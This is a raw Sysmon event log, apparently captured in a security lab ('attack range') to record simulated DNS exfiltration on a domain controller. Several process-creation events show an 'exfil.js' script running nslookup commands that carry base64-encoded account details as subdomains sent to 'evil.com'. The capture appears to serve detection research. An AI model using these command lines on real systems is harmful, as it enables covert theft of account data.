14:16:16.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.374{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C53E-000000005F02}5436C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.374{2E1864BB-17B0-629A-C33E-000000005F02}66521300C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-C53E-000000005F02}5436C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.374{2E1864BB-17B0-629A-C53E-000000005F02}5436C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B0-629A-C33E-000000005F02}6652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldcgrhjx.tmp 2>&1 10341000x8000000000000000196512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.326{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-C43E-000000005F02}7632C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.325{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFF7ACF79E1AF8BFBE928EFC6FD8E33,SHA256=583B981E5867A2ED935CC34C559937242D59D4279D9114E6F22D979C17E39878,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.325{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-C43E-000000005F02}7632C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.305{2E1864BB-17B0-629A-C43E-000000005F02}76326824C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-C33E-000000005F02}6652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.289{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CDA15DE62F2B31F6E2A1E4D29BED40A,SHA256=DE5080715C8E76B0032A1D627B88647B71066E14F4821230C13F614A7C17FFBB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.289{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C43E-000000005F02}7632C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.289{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.289{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.289{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.289{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.289{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C33E-000000005F02}6652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.289{2E1864BB-17A1-629A-783D-000000005F02}55523956C:\Windows\System32\WScript.exe{2E1864BB-17B0-629A-C33E-000000005F02}6652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.291{2E1864BB-17B0-629A-C33E-000000005F02}6652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldcgrhjx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.273{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlallmr.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.226{2E1864BB-17B0-629A-C13E-000000005F02}60166012C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-C23E-000000005F02}7052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.226{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.226{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.226{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.226{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.226{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C23E-000000005F02}7052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.226{2E1864BB-17B0-629A-C03E-000000005F02}81005920C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-C23E-000000005F02}7052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.230{2E1864BB-17B0-629A-C23E-000000005F02}7052C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B0-629A-C03E-000000005F02}8100C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlallmr.tmp 2>&1 10341000x8000000000000000196490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.189{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-C13E-000000005F02}6016C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.189{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-C13E-000000005F02}6016C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.173{2E1864BB-17B0-629A-C13E-000000005F02}60166012C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-C03E-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.173{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C13E-000000005F02}6016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+8